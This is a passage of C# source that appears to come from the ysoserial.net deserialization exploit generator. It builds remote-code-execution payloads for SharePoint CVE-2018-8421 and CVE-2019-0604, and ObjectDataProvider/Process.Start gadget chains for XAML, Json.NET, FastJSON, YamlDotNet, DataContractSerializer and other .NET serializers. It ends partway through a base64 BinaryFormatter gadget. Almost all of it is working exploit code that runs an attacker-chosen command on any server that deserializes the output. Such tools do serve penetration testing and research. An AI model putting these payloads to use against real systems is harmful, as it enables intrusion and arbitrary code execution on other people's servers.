public string CVE_2018_8421()
{
string payload = "";
if (useurl)
{
payload = @"<?xml version=""1.0"" encoding=""utf-8""?>
<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns=""http://microsoft.com/sharepoint/webpartpages""><workflowMarkupText><![CDATA[
<SequentialWorkflowActivity x:Class=""."" x:Name=""Workflow2"" xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/workflow"">
<Rd:ResourceDictionary xmlns:Rd=""clr-namespace:System.Windows;Assembly=PresentationFramework,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"" Source=""" + cmd + @"""/>
</SequentialWorkflowActivity>
]]></workflowMarkupText>
<rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>";
}
else
{
Boolean hasArgs;
string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);
String cmdPart;
if (hasArgs)
{
cmdPart = $@"<Diag:ProcessStartInfo FileName=""" + splittedCMD[0] + @""" Arguments=""" + splittedCMD[1] + @""">";
}
else
{
cmdPart = $@"<Diag:ProcessStartInfo FileName=""" + splittedCMD[0] + @""">";
}
payload = @"<?xml version=""1.0"" encoding=""utf-8""?>
<soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""><soap:Body><ValidateWorkflowMarkupAndCreateSupportObjects xmlns=""http://microsoft.com/sharepoint/webpartpages""><workflowMarkupText><![CDATA[
<SequentialWorkflowActivity x:Class=""."" x:Name=""Workflow2"" xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/workflow"">
<Rd:ResourceDictionary xmlns:System=""clr-namespace:System;assembly=mscorlib, Version=4.0.0.0,
Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:Diag=""clr-namespace:System.Diagnostics;assembly=System,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"" xmlns:Rd=""clr-namespace:System.Windows;Assembly=PresentationFramework,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"" xmlns:ODP=""clr-namespace:System.Windows.Data;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=31bf3856ad364e35"">
<ODP:ObjectDataProvider x:Key=""LaunchCmd"" MethodName=""Start"">
<ObjectDataProvider.ObjectInstance><Diag:Process><Diag:Process.StartInfo>" + cmdPart + @"</Diag:ProcessStartInfo></Diag:Process.StartInfo></Diag:Process>
</ObjectDataProvider.ObjectInstance>
</ODP:ObjectDataProvider>
</Rd:ResourceDictionary>
</SequentialWorkflowActivity>
]]></workflowMarkupText>
<rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMarkupAndCreateSupportObjects></soap:Body></soap:Envelope>";
}
// minimisation of payload is not important here but we can do it if needed!
return(payload);
}
public string CVE_2019_0604()
{
Boolean hasArgs;
string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);
String cmdPart;
if (hasArgs)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>";
}
string payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";
/*
* string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
* <ExpandedElement/>
* <ProjectedProperty0>
* <MethodName>Parse</MethodName>
* <MethodParameters>
* <anyType xsi:type=""xsd:string"">
* <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
* </anyType>
* </MethodParameters>
* <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
* </ProjectedProperty0>
* </ExpandedWrapperOfXamlReaderObjectDataProvider>";
* //*/
string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";
payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding
//Console.WriteLine(payloadPart2);
string payload = payloadPart1 + payloadPart2;
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append("__bp");
HexEncode(checked ((char)(payload.Length << 2)), stringBuilder);
HexEncode(payload, stringBuilder);
return(stringBuilder.ToString());
}
public override object Generate(string formatter, InputArgs inputArgs)
{
// NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml
if (formatter.ToLower().Equals("xaml"))
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = inputArgs.CmdFileName;
if (inputArgs.HasArguments)
{
psi.Arguments = inputArgs.CmdArguments;
}
StringDictionary dict = new StringDictionary();
psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict);
Process p = new Process();
p.StartInfo = psi;
ObjectDataProvider odp = new ObjectDataProvider();
odp.MethodName = "Start";
odp.IsInitialLoadEnabled = false;
odp.ObjectInstance = p;
string payload = "";
if (variant_number == 2)
{
ResourceDictionary myResourceDictionary = new ResourceDictionary();
myResourceDictionary.Add("", odp);
// XAML serializer can also be exploited!
payload = SerializersHelper.Xaml_serialize(myResourceDictionary);
}
else if (variant_number == 3)
{
if (xaml_url == "")
{
Console.WriteLine("Url parameter was not provided.");
Console.WriteLine("Try 'ysoserial --fullhelp' for more information.");
System.Environment.Exit(-1);
}
// There are loads of other objects in Presentation that use XAML URLs and they can be used here instead
payload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" Source=""" + xaml_url + @"""/>";
}
else if (variant_number == 4)
{
inputArgs.IsSTAThread = true; // we need STAThreadAttribute here
string bridge = SerializersHelper.Xaml_serialize(odp);
if (inputArgs.Minify)
{
// using discardable regex array to make it shorter!
bridge = XMLMinifier.Minify(bridge, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " });
}
// There are loads of other objects in Presentation that use ResourceDictionary and they can all be used here instead
payload = @"<WorkflowDesigner xmlns=""clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"" PropertyInspectorFontAndColorData=""" + CommandArgSplitter.XmlStringAttributeEscape(bridge) + @"""/>";
}
else
{
//payload = XamlWriter.Save(odp);
payload = SerializersHelper.Xaml_serialize(odp);
}
if (inputArgs.Minify)
{
// using discardable regex array to make it shorter!
payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " });
}
if (inputArgs.Test)
{
if (inputArgs.IsSTAThread)
{
var staThread = new System.Threading.Thread(delegate()
{
try {
SerializersHelper.Xaml_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
});
staThread.SetApartmentState(System.Threading.ApartmentState.STA);
staThread.Start();
staThread.Join();
}
else
{
try
{
SerializersHelper.Xaml_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
}
return(payload);
}
if (formatter.ToLower().Equals("json.net"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
string cmdPart = "";
if (inputArgs.HasArguments)
{
cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'";
}
else
{
cmdPart = "'" + inputArgs.CmdFileName + "'";
}
String payload = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':[" + cmdPart + @"]
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
if (inputArgs.Minify)
{
if (inputArgs.UseSimpleType)
{
payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null);
}
else
{
payload = JSONMinifier.Minify(payload, null, null);
}
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JsonNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("fastjson"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @"""";
}
else
{
cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @"""";
}
String payload = @"{
""$types"":{
""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"",
""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"",
""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3""
},
""$type"":""1"",
""ObjectInstance"":{
""$type"":""2"",
""StartInfo"":{
""$type"":""3"",
" + cmdPart + @"
}
},
""MethodName"":""Start""
}";
if (inputArgs.Minify)
{
payload = JSONMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
var instance = JSON.ToObject <Object>(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("javascriptserializer"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'";
}
else
{
cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'";
}
String payload = @"{
'__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'ObjectInstance':{
'__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'StartInfo': {
'__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
" + cmdPart + @"
}
}
}";
if (inputArgs.Minify)
{
payload = JSONMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.JavaScriptSerializer_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("xmlserializer"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
}
String payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" >
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string"">
<![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
";
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.XMLSerializer_deserialize(payload, null, "root", "type");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
String cmdPart, payload;
if (variant_number == 2)
{
if (inputArgs.HasArguments)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
}
payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"">
<ExpandedElement z:Id=""ref1"" >
<__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
</ExpandedElement>
<ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
<a:MethodName>Parse</a:MethodName>
<a:MethodParameters>
<anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
<![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
</anyType>
</a:MethodParameters>
<a:ObjectInstance z:Ref=""ref1""/>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW>
</root>
";
}
else if (variant_number == 3)
{
payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"">
<ExpandedElement z:Id=""ref1"" >
<__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
</ExpandedElement>
<ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
<a:MethodName>Parse</a:MethodName>
<a:MethodParameters>
<anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
<![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">xxxxx</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
</anyType>
</a:MethodParameters>
<a:ObjectInstance z:Ref=""ref1""/>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW>
</root>
";
}
else
{
if (inputArgs.HasArguments)
{
cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType>
<b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>";
}
else
{
cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>";
}
payload = $@"<?xml version=""1.0""?>
<root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal""
xmlns:c=""http://www.w3.org/2001/XMLSchema""
xmlns:i=""http://www.w3.org/2001/XMLSchema-instance""
xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""
>
<ExpandedElement z:Id=""ref1"" >
<__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/>
</ExpandedElement>
<ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data"">
<a:MethodName>Start</a:MethodName>
<a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">
" + cmdPart + @"
</a:MethodParameters>
<a:ObjectInstance z:Ref=""ref1""/>
</ProjectedProperty0>
</ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL>
</root>
";
}
if (inputArgs.Minify)
{
payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.DataContractSerializer_deserialize(payload, null, "root", "type");
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("yamldotnet"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = $@"FileName: " + inputArgs.CmdFileName + @",
Arguments: " + inputArgs.CmdArguments;
}
else
{
cmdPart = $@"FileName: " + inputArgs.CmdFileName;
}
String payload = @"
!<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> {
MethodName: Start,
ObjectInstance:
!<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> {
StartInfo:
!<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> {
" + cmdPart + @"
}
}
}";
if (inputArgs.Minify)
{
payload = YamlDocumentMinifier.Minify(payload);
}
if (inputArgs.Test)
{
try
{
SerializersHelper.YamlDotNet_deserialize(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLower().Equals("fspickler"))
{
inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
String cmdPart;
if (inputArgs.HasArguments)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>";
}
String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>";
internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload);
String payload = @"{
""FsPickler"": ""4.0.0"",
""type"": ""System.Object"",
""value"": {
""_flags"": ""subtype"",
""subtype"": {
""Case"": ""NamedType"",
""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"",
""Assembly"": {
""Name"": ""Microsoft.PowerShell.Editor"",
""Version"": ""3.0.0.0"",
""Culture"": ""neutral"",
""PublicKeyToken"": ""31bf3856ad364e35""
}
},
""instance"": {
""serializationEntries"": [
{
""Name"": ""ForegroundBrush"",
""Type"": {
""Case"": ""NamedType"",
""Name"": ""System.String"",
""Assembly"": {
""Name"": ""mscorlib"",
""Version"": ""4.0.0.0"",
""Culture"": ""neutral"",
""PublicKeyToken"": ""b77a5c561934e089""
}
},
""Value"": """ + internalPayload + @"""
}
]
}
}
}";
if (inputArgs.Minify)
{
payload = JSONMinifier.Minify(payload, null, null);
}
if (inputArgs.Test)
{
try
{
var serializer = MBrace.CsPickler.CsPickler.CreateJsonSerializer(true);
serializer.UnPickleOfString <Object>(payload);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(payload);
}
else if (formatter.ToLowerInvariant().Equals("sharpserializerbinary"))
{
// Binary Serialization Mode
object serializedData = SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Serialize(inputArgs.Cmd);
if (inputArgs.Test)
{
SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Deserialize(serializedData);
}
return(serializedData);
}
else if (formatter.ToLowerInvariant().Equals("sharpserializerxml"))
{
// XML Serialization Mode
string serializedData = (string)SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Serialize(inputArgs.Cmd);
if (inputArgs.Test)
{
SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Deserialize(serializedData);
}
return(serializedData);
}
else
{
throw new Exception("Formatter not supported");
}
}
public override object Generate(string formatter, InputArgs inputArgs)
{
/*
* // This is how ResourceSet can be used directly but the payload would fire!
* object generatedPayload = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(inputArgs);
*
* using (ResourceWriter rw = new ResourceWriter(@".\ResourceSetGenerator.resources"))
* {
* rw.AddResource("", generatedPayload);
* rw.Generate();
* rw.Close();
* }
*
* // Payload will be executed once here which is annoying but without surgical insertion or something to parse binaryformatter objects, it is quite hard to prevent this
* ResourceSet myResourceSet = new ResourceSet(@".\ResourceSetGenerator.resources");
*
* // TextFormattingRunPropertiesGenerator is the preferred method due to its short length. However, we need to insert it manually into a serialized object as ResourceSet cannot tolerate it
*
* //*/
//TestMore(inputArgs);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) ||
formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase))
{
string payload = "";
// This to prevent code execution when running
byte[] bfSerializedObj;
if (internalgadget == 1)
{
// This is an example of using SimpleBinaryFormatterParser
//
string obj25Type = "", obj25Value = "", obj26Value = "";
byte[] cmdFile7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdFileName);
byte[] obj26ValueObjId = new byte[] { 0x0c, 0, 0, 0 };
obj26Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj26ValueObjId, cmdFile7bitLV));
if (inputArgs.HasArguments)
{
byte[] obj25TypeByte = new byte[] { 0x06 };
byte[] obj25ValueObjId = new byte[] { 0x0b, 0, 0, 0 };
byte[] cmdArgs7bitLV = SimpleBinaryFormatterParser.Create7bitLengthObjectString(inputArgs.CmdArguments);
obj25Type = Convert.ToBase64String(obj25TypeByte);
obj25Value = Convert.ToBase64String(SimpleBinaryFormatterParser.ConcatTwoByteArrays(obj25ValueObjId, cmdArgs7bitLV));
}
else
{
byte[] obj25TypeByte = new byte[] { 0x09 };
byte[] obj25ValueObjId = new byte[] { 0x05, 0, 0, 0 };
obj25Type = Convert.ToBase64String(obj25TypeByte);
obj25Value = Convert.ToBase64String(obj25ValueObjId);
}
payload = @"{'headerBytes':'AAEAAAD/////AQAAAAAAAAA=','binaryFormatterObjects':[{'orderId':1,'typeBytes':'BA==','valueBytes':'AQAAABxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlU2V0AgAAAAVUYWJsZRVfY2FzZUluc2Vuc2l0aXZlVGFibGUDAxxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlHFN5c3RlbS5Db2xsZWN0aW9ucy5IYXNodGFibGU='},{'orderId':2,'typeBytes':'CQ==','valueBytes':'AgAAAA=='},{'orderId':3,'typeBytes':'Cg==','valueBytes':''},{'orderId':4,'typeBytes':'BA==','valueBytes':'AgAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgg='},{'orderId':5,'typeBytes':null,'valueBytes':'7FE4Pw=='},{'orderId':6,'typeBytes':null,'valueBytes':'AQAAAA=='},{'orderId':7,'typeBytes':'Cg==','valueBytes':''},{'orderId':8,'typeBytes':'Cg==','valueBytes':''},{'orderId':9,'typeBytes':null,'valueBytes':'AwAAAA=='},{'orderId':10,'typeBytes':'CQ==','valueBytes':'AwAAAA=='},{'orderId':11,'typeBytes':'CQ==','valueBytes':'BAAAAA=='},{'orderId':12,'typeBytes':'EA==','valueBytes':'AwAAAAEAAAA='},{'orderId':13,'typeBytes':'Bg==','valueBytes':'BQAAAAA='},{'orderId':14,'typeBytes':'EA==','valueBytes':'BAAAAAEAAAA='},{'orderId':15,'typeBytes':'CQ==','valueBytes':'BgAAAA=='},{'orderId':16,'typeBytes':'DA==','valueBytes':'BwAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':17,'typeBytes':'BQ==','valueBytes':'BgAAAEBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Tb3J0ZWRTZXRgMVtbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl1dBAAAAAVDb3VudAhDb21wYXJlcgd